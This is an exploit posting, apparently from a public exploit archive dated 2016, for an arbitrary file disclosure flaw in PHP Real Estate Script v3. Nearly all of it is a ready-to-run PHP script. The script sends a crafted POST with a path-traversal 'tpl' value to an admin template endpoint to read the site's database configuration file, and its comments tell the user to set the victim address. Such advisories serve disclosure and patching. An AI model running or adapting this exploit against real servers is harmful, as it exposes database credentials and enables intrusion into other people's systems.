PHP Real Estate Script 3 Arbitrary File Disclosure
Posted on 09 July 2016
# Exploit Title: php Real Estate Script Arbitrary File Disclosure # Date: 2016-07-08 # Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com # Vendor Homepage: http://www.realestatescript.eu/ # Version: v.3 # Download Link : http://www.realestatescript.eu/downloads/realestatescript-v3.zip Exploit : <?php //read db config file $post_data = 'tpl=../../private/config/db.php';//change read file path $host = "www.server.local";//change victim address $socket = fsockopen($host, 80, $errno, $errstr, 15); if(!$socket){ echo ' error: ' . $errno . ' ' . $errstr; die; }else{ //change [demo/en] path server $path = "/demo/en/"; $http = "POST {$path}admin/ajax_cms/get_template_content/ HTTP/1.1 "; $http .= "Host: $host "; $http .= "Content-Type: application/x-www-form-urlencoded "; $http .= "Content-length: " . strlen($post_data) . " "; $http .= "Connection: close "; $http .= $post_data . " "; fwrite($socket, $http); $contents = ""; while (!feof($socket)) { $contents .= fgets($socket, 4096); } fclose($socket); $e = explode('Content-Type: text/html',$contents); print $e[1]; } ?>
